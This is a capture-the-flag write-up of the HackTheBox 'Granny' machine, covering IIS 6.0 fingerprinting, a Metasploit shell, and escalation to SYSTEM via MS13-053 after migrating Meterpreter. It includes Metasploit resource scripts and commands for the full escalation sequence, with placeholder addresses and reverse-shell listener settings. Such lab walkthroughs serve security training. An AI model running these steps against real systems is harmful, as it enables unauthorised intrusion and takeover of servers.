Granny Writeup

Sep 19, 2018 • ctf,boot2root,hackthebox


Screenshot

i. Port Scan

Screenshot

ii. Enumeration

Navigating to port 80:

Screenshot

We're presented with an "Under Construction" page.

Running Nikto to fingerprint the web server software:

Screenshot

Nikto reports IIS 6.0. IIS 6 shipped with Windows Server 2003 in 2003 (and again with 2003 R2 in 2005), and Windows Server 2003 left extended support in July 2015, so we're looking at a roughly 15-year-old, end-of-life web server.

Software that old is almost guaranteed to have public exploits, so the next step is to search for one.
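The same fingerprinting can be done from inside Metasploit, which keeps the whole box in one tool. The resource script below is an added example, not part of the original writeup; the target address is a placeholder and the module names are Metasploit's own `http_version` and `options` scanners.

```rc
# granny-enum.rc: added example, not from the original writeup.
# Assumes the box is reachable at 10.10.10.15 (placeholder; substitute the real IP).
# Run with: msfconsole -q -r granny-enum.rc
setg RHOSTS 10.10.10.15
setg RPORT 80

# Banner grab: should print the same Microsoft-IIS/6.0 header that Nikto reported.
use auxiliary/scanner/http/http_version
run

# Enumerate the HTTP methods the server accepts. On a server this old, anything
# beyond GET/HEAD/POST in the Allow header is worth reading up on before picking
# an exploit, because the public exploits differ in which methods they need.
use auxiliary/scanner/http/options
run
```

`setg` sets the options globally so both scanners (and any later exploit module) pick them up without repeating `set RHOSTS`.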

Screenshot

Running the exploit in Metasploit:

Screenshot

Awesome, we got a shell!

iii. Privilege Escalation

getuid shows that we are NT AUTHORITY\NETWORK SERVICE:

Screenshot

NETWORK SERVICE is a built-in service account with far fewer local rights than SYSTEM, so we still need to escalate. See [0] for the difference between the two accounts.

Metasploit has a local exploit suggester module (post/multi/recon/local_exploit_suggester) which lists local exploits the session's host may be vulnerable to, based on the OS version and patch level:

Screenshot

We'll try the last one listed, exploit/windows/local/ppr_flatten_rec (MS13-053).

To do so, first background the session, then select the module and set its options:

Screenshot

meterpreter > background          # send the session to the background, back to the msf prompt
msf > sessions                    # list available sessions and their IDs
msf > set SESSION <id>            # the session number from the list above

Once the options are setup, run the exploit:

Screenshot

RequestError stdapi_sys_config_getsid

A strange error: the exploit module asks the Meterpreter for the session's SID (getsid) and that request fails in the process we landed in.

The fix is to migrate the Meterpreter into a different process.

First switch back to the session (sessions -i <id>) and run ps to list the running processes:

Screenshot

Then migrate to another process.

Note: we can only migrate into a process we already have rights to open, i.e. one running as the same account (NETWORK SERVICE) or with lower privileges. Picking a SYSTEM process from the list will fail with an access error.

Screenshot

Re-run the exploit as before:

Screenshot

getuid now reports NT AUTHORITY\SYSTEM.
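The whole escalation sequence above (suggester, first failed attempt, migrate, retry) can be replayed as a Metasploit resource script. This is an added example, not part of the original writeup. It assumes the initial Meterpreter session is ID 1 and has already been backgrounded, that the attacker listener address 10.10.14.2 is a placeholder for your own VPN IP, and that 1234 stands in for a PID you read off `ps` belonging to another NETWORK SERVICE process.

```rc
# granny-privesc.rc: added example, not from the original writeup.
# Assumptions: initial session is ID 1 (backgrounded), LHOST 10.10.14.2 is a
# placeholder, and 1234 is a placeholder PID taken from `ps` for a process
# owned by NT AUTHORITY\NETWORK SERVICE.
# Run from the msf prompt: resource granny-privesc.rc

# 1. Ask the suggester which local exploits match this session.
use post/multi/recon/local_exploit_suggester
set SESSION 1
run

# 2. First attempt at ppr_flatten_rec. Run straight from the process the web
#    exploit landed in, this aborts with "RequestError stdapi_sys_config_getsid".
#    LPORT is kept distinct from the first handler's port so the two don't clash.
use exploit/windows/local/ppr_flatten_rec
set SESSION 1
set LHOST 10.10.14.2
set LPORT 4445
run

# 3. Move the Meterpreter into another process we are allowed to open. Take the
#    PID from the ps listing and make sure its user column is NETWORK SERVICE,
#    not SYSTEM; migrating into a higher-privileged process is refused.
sessions -C ps -i 1
sessions -C "migrate 1234" -i 1

# 4. Retry the exploit from the new host process; the module is still selected,
#    so a bare run reuses the options set in step 2.
run

# 5. Confirm the new session is SYSTEM (ID 2 if this is the second session opened).
sessions -C getuid -i 2
```

`sessions -C` runs a single Meterpreter command on a backgrounded session without interacting with it, which is what lets the migrate step sit inside a resource script instead of being typed by hand.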

iv. Conclusion

This is a great beginner box for getting started with Metasploit.

Thanks for reading.

Sources / Links:
[0]: https://serverfault.com/questions/217654/difference-between-nt-authority-network-service-and-nt-authority-system